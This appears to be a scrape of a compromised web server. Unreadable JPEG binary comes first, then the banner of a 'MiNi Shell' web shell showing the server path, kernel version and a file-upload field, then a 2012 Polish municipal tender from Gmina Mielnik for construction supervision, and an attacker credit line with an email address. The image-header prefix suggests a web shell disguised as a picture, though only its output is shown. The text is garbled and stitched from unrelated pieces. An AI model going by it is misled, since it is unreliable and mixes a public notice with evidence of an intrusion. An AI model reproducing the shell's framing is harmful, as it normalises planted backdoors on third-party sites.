JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120726/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120726/271480-N-2012.html

<p class="kh_header"><b>Mielnik: Pełnienie nadzoru inwestorskiego w zadaniu inwestycyjnym pn. Budowa oczyszczalni ścieków wraz z kanalizacją w Mielniku - II etap - budowa kanalizacji sanitarnej wraz z modernizacją stacji uzdatniania wody w Mielniku</b><br>
<b>Numer ogłoszenia: 271480 - 2012; data zamieszczenia: 26.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mielnik , ul. Piaskowa 38, 17-307 Mielnik, woj. podlaskie, tel. 085 6577003, faks 085 6577121.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mielnik.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego w zadaniu inwestycyjnym pn. Budowa oczyszczalni ścieków wraz z kanalizacją w Mielniku - II etap - budowa kanalizacji sanitarnej wraz z modernizacją stacji uzdatniania wody w Mielniku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Pełnienie nadzoru inwestorskiego w zadaniu inwestycyjnym pn. Budowa oczyszczalni ścieków wraz z kanalizacją w Mielniku - II etap - budowa kanalizacji sanitarnej wraz z modernizacją stacji uzdatniania wody w Mielniku dofinansowanym ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego  na lata 2007-2013 w ramach działania 5.2 Rozwój lokalnej infrastruktury ochrony środowiska w ramach realizacji projektu Budowa kanalizacji sanitarnej wraz z modernizacją stacji uzdatniania wody w Mielniku - szansą na zachowanie dziedzictwa przyrodniczego i zwiększenie tempa rozwoju gospodarczego gminy i regionu
Przedmiotem zamówienia jest świadczenie na rzecz Zamawiającego usługi nadzoru inwestorskiego oraz zarządzania zadaniem inwestycyjnym w zakresie następujących czynności:
1)Sprawowanie nadzoru inwestorskiego (zgodnie z art.25 i art.26 Ustawy prawo budowlane) we wszystkich specjalnościach technicznych niezbędnych dla prawidłowej realizacji robót budowlanych wykonywanych w ramach przedsięwzięcia inwestycyjnego, w szczególności:
a)reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej,
b)kontrola jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie,
c)sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających,
d)uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywania ich do użytkowania,
e)ustanowienie inspektorów nadzoru inwestorskiego wszystkich niezbędnych branż, posiadających uprawnienia i doświadczenie w nadzorowaniu inwestycji,
f)potwierdzanie faktycznie wykonanych robót oraz usunięcia wad,
g)kontrolowanie rozliczeń budowy.
2)Zarządzania projektem inwestycyjnym, w szczególności:
a)koordynacja procedurą przekazywania wykonawcy robót terenu budowy, 
b)koordynacja usługą nadzoru inwestorskiego,
c)koordynacja usługą nadzoru autorskiego (zabezpieczonego przez Zamawiającego) - polegająca na:
-bieżącym zgłaszaniu problematyki ewentualnych wad i_lub nieścisłości i_lub zawiłości merytorycznych dokumentacji projektowej, przy czynnym udziale przedstawicieli Zamawiającego i wykonawcy robót budowlanych,
-występowaniu do Zamawiającego z umotywowanymi wnioskami dotyczącymi konieczności opracowania dodatkowej i_lub zamiennej dokumentacji projektowej będącej konsekwencją bieżących uwarunkowań procesu inwestycyjnego niemożliwych do przewidzenia na etapie planowania inwestycji,
d)organizowanie i prowadzenie narad budowy, w których uczestniczą strony umowy na wykonanie robót budowlanych i_lub uczestnicy procesu budowlanego (tj. pełnomocni przedstawiciele Zamawiającego i wykonawcy robót budowlanych, kierownik budowy(kierownicy robót), inspektorzy nadzoru inwestorskiego) - ustalenia, które będą miały odzwierciedlenie w stosownych protokołach,
e)opracowanie wzoru dokumentów roboczych procesu budowlanego i uzyskanie akceptacji Zamawiającego, a w konsekwencji ich wdrożenie do obiegu formalnego inwestycji,
f)bieżące dokumentowanie procesu inwestycyjnego, umożliwiające Zamawiającemu precyzyjną kontrolę nad jego przebiegiem - w zakresie i formie umożliwiającej: 
-precyzyjny monitoring:
a.rzeczywistego zaawansowania rzeczowo-finansowego robót w zadaniu, w każdym momencie realizacji inwestycji, jednakże nie rzadziej niż 1 raz na miesiąc kalendarzowy,
b.jakości i terminowości realizacji robót w zadaniu,
c.zakresu i sposobu rozwiązywania bieżącej problematyki technicznej i organizacyjnej procesu budowlanego,
-precyzyjną kwalifikację rzeczywistego wymiaru zaawansowania rzeczowo-finansowego robót w zadaniu w układzie wymaganych kategorii kosztowych,
-rozliczenie pomocowych i budżetowych środków finansowych przeznaczonych na realizację inwestycji, tj. w szczególności kontrola kosztów i rozliczenia finansowego inwestycji, potwierdzenie kosztorysów powykonawczych, złożonych przez Wykonawcę, a w szczególności:
e)sprawdzenie stanu rzeczowego z natury (obmiar) wykonania zadania. Projekty powykonawcze, złożone przez Wykonawcę i zatwierdzone przez inspektora nadzoru inwestorskiego są podstawą rozliczenia inwestycji dofinansowanej ze środków zewnętrznych; za błędy, niezgodności i odstępstwa od faktycznego stanu rzeczowego przedstawionego w dokumentacji odpowiada inspektor nadzoru inwestorskiego;
f)niezgodność dokumentacji powykonawczej z wykonaną budową, w konsekwencji straty finansowe w kosztach kwalifikowalnych inwestycji są podstawą do pociągnięcia do odpowiedzialności za niedopełnienie funkcji i obowiązków przez inspektora nadzoru inwestorskiego.
g)archiwizacja duplikatów(kopii) wszystkich dokumentów procesu budowlanego realizowanego w ramach: umowy na wykonanie robót budowlanych i usługi stanowiącej przedmiot nn. zamówienia,
h)udostępnianie Zamawiającemu, na każde jego pisemne lub werbalne żądanie, wszelkich zarchiwizowanych dokumentów lub ich duplikatów(kopii) związanych z realizacją inwestycji,
i)sporządzania na piśmie comiesięcznych sprawozdań z realizacji inwestycji wraz z dokumentacją fotograficzną,
j)sporządzanie, kompletowanie i merytoryczne opiniowanie wszystkich dokumentów warunkujących bieżące płatności dla wykonawcy robót budowlanych w terminach określonych umową Zamawiającego z tym uczestnikiem procesu budowlanego,
k)inicjowanie procedur akceptacji przez stronę zamawiającą zasadności wykonania robót zamiennych i_lub dodatkowych - poprzez przygotowanie i przedłożenie stronie zamawiającej do weryfikacji i akceptacji stosownych do okoliczności projektów dokumentów formalno-prawnych,
l)inicjowanie procedur akceptacji przez stronę zamawiającą zasadności zaniechania wykonania robót - poprzez przygotowanie i przedłożenie stronie zamawiającej do weryfikacji i akceptacji stosownych do okoliczności projektów dokumentów formalno-prawnych,
m)informowanie na piśmie stronę zamawiającą o wszelkich faktach mających znaczenie dla realizacji inwestycji, a w tym w szczególności o ewentualnych okolicznościach mogących skutkować nieterminową realizacją umowy na wykonanie robót budowlanych i_lub odstąpieniem wykonawcy budowlanego od jej realizacji,
n)inicjowanie ewentualnych zmian postanowień umowy na wykonanie robót budowlanych w kontekście okoliczności przewidzianych tą umową - poprzez przygotowanie i przedłożenie stronie zamawiającej do weryfikacji i akceptacji stosownych do okoliczności projektów dokumentów formalno-prawnych,
o)bieżąca weryfikacja umownych harmonogramów rzeczowo-finansowych inwestycji - umożliwiająca:
-dostosowanie procesu finansowania inwestycji do aktualnego tempa realizacji robót w zadaniu,
-dostosowanie tempa realizacji robót w zadaniu do aktualnych możliwości procesu finansowania inwestycji.
p)bieżące podejmowanie możliwych działań zmierzających do uniknięcia sporu na tle reklamacyjnym między stronami umowy na wykonanie robót budowlanych,
q)inicjowanie, w razie uzasadnionych okoliczności, procedur dodatkowych badań wbudowanych materiałów, urządzeń i jakości wykonanych robót przez wykonawcę umowy na wykonanie robót budowlanych, tj. badań których nie przewiduje umowa na wykonanie robót budowlanych oraz warunki techniczne wykonania i odbioru robót budowlanych na zasadach merytoryczno-finansowych określonych w kontrakcie budowlanym,
r)koordynacja działaniami stron umowy na wykonanie robót budowlanych w przypadku odstąpienia od niej którejś ze stron,
s)merytoryczne wsparcia strony zamawiającej w ewentualnej procedurze postępowania reklamacyjnego wszczętego w wyniku sporu pomiędzy stronami umowy na wykonanie robót budowlanych, w tym przygotowanie stosownej dokumentacji do arbitrażu,
t)pozaksięgowa ewidencja kosztów inwestycyjnych generowanych w ramach: 
-umowy na wykonanie robót budowlanych,
-umowy na nadzór inwestorski,
-innych umów(kontraktów) ustalonych z Zamawiającym,
u)czynne wsparcie merytoryczne strony zamawiającej w procedurze:
-sprawozdawczości wewnętrznej Zamawiającego i dla  Instytucji Zarządzającej Programem Pomocowym,
-formalnego rozliczania kosztów inwestycji finansowanych ze środków budżetowych Zamawiającego i środków pomocowych,
-aplikowania do Instytucji Zarządzającej Programem Pomocowym o wprowadzenie zmian do umowy o pomoc finansową, 
v)koordynacja procedurą: odbiorów technicznych, rozruchów technologicznych, odbiorów częściowych(etapowych) i odbioru końcowego,
w)sporządzenie dokumentów przejęcia na majątek Zamawiającego środka trwałego stanowiącego produkt realizacji inwestycji,
x)obecność na terenie realizacji inwestycji w przypadku kontroli inwestycji ze strony instytucji realizujących dofinansowanie ze środków zewnętrznych, w tym również po zakończeniu realizacji inwestycji.
y)obsługa gwarancyjna inwestycji - polegająca m. in. na:
-czynnym udziale wszystkich uczestników procesu budowlanego reprezentujących usługodawcę w procedurze przeglądów gwarancyjnych przedmiotu inwestycji w terminach wyznaczonych przez Zamawiającego, terminy gwarancyjne obowiązujące nadzór inwestorski są takie jak dla wykonawcy robót budowlanych, tj. 36 miesięcy od dnia podpisania bezusterkowego protokołu końcowego odbioru robót budowlanych;
-sporządzaniu stosownych protokołów z przeglądu gwarancyjnego - identyfikujących: termin przeglądu, skład osobowy uczestników przeglądu, dokonane czynności kontrolne, zidentyfikowane wady przedmiotu inwestycji, zalecone sposoby i terminy usunięcia zidentyfikowanych wad oraz inne ustalenia dokonane przez uczestników przeglądu,
-sprawdzeniu stanu realizacji zaleceń pokontrolnych przeglądu gwarancyjnego -  potwierdzonych każdorazowo stosownym protokołem - zakończonym odpowiednimi  wnioskami do Zamawiającego, w tym dotyczącymi sfery karno-odszkodowawczej z tytułu roszczeń gwarancyjnych
Zamawiający zastrzega, że całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda od Wykonawcy wskazania w ofercie ewentualnych części zamówienia, które ten przewiduje powierzyć do wykonania podwykonawcom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.54.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Warunkiem ważności oferty jest wniesienie przez Wykonawcę WADIUM o wartości: 4 000,00 zł (słownie: cztery tysiące złotych) 
2.Wadium musi obejmować okres związania ofertą.
Wpłaty wadium należy dokonać przed terminem ustalonym dla składania ofert nie później niż do dnia 03.08.2012 r. do godz. 11:00 na konto Zamawiającego nr 63 8071 0006 0015 3562 2000 0040 z dopiskiem na przelewie WADIUM i oznaczyć: Pełnienie nadzoru inwestorskiego w zadaniu inwestycyjnym pn. Budowa oczyszczalni ścieków wraz z kanalizacją w Mielniku - II etap - budowa kanalizacji sanitarnej wraz z modernizacją stacji uzdatniania wody w Mielniku
3.Wadium wnoszone w pieniądzu
Wadium wniesione przelewem na konto Zamawiającego uznane będzie za wniesione w terminie, jeżeli przed terminem składania ofert zostanie zaksięgowane na koncie Zamawiającego.
Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
-Potwierdzenie wniesienia wadium należy dołączyć do oferty
4.Wadium wnoszone w formie niepieniężnej
Wadium może być również wnoszone w:
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-gwarancjach bankowych,
-gwarancjach ubezpieczeniowych,
-poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (tekst jednolity Dz. U. z 2007 r. Nr 42, poz. 275 ze zm.)
Oryginał wadium wnoszonego w formie niepieniężnej musi być dołączony do oferty (zaleca się załączenie oryginału wadium w sposób umożliwiający jego zwrot zgodnie z przepisami ustawy oraz załączenie w ofercie kopii tego oryginału).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.3. i 1.4. SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.3. i 1.4. SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień umowy mogą dotyczyć:
a.zmiany terminu umownego realizacji usługi - wynikające:
-z przedłużenia terminu realizacji robót budowlanych w zadaniu - z przyczyn niezależnych od   wykonawcy usługi
-ze skrócenia terminu realizacji robót budowlanych w zadaniu - z przyczyn ograniczenia zakresu rzeczowego inwestycji będącego skutkiem ograniczenia budżetu finansowego inwestycji
-z innych nadzwyczajnych zdarzeń niezależnych od Zamawiającego, których Zamawiający nie mógł przewidzieć na etapie planowania i kontraktowania inwestycji, a które mogą mieć wpływ m. in. na efektywność: robót budowlanych, usługi nadzoru autorskiego, usługi będącej przedmiotem nn. zamówienia, inżynierii finansowania inwestycji oraz odbioru i wdrożenia do eksploatacji produktu realizacji inwestycji. 
b. zmiany uczestnika(ów) procesu budowlanego (w rozumieniu Prawa budowlanego) oraz innych przewidzianych umową osób zespołu Wykonawcy usługi - z przyczyn bieżących uwarunkowań prowadzonej przez Wykonawcę usługi działalności gospodarczej - z zastrzeżeniem dopuszczenia tylko tych zmian, które spełniają warunki SIWZ w zakresie dysponowania przez wykonawcę osobami zdolnymi do wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mielnik.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Mielnik
ul. Piaskowa 38
17-307 Mielnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2012 godzina 11:00, miejsce: Urząd Gminy Mielnik
ul. Piaskowa 38
17-307 Mielnik
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja dofinansowana ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego  na lata 2007-2013 w ramach działania 5.2 Rozwój lokalnej infrastruktury ochrony środowiska w ramach realizacji projektu Budowa kanalizacji sanitarnej wraz z modernizacją stacji uzdatniania wody w Mielniku - szansą na zachowanie dziedzictwa przyrodniczego i zwiększenie tempa rozwoju gospodarczego gminy i regionu.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com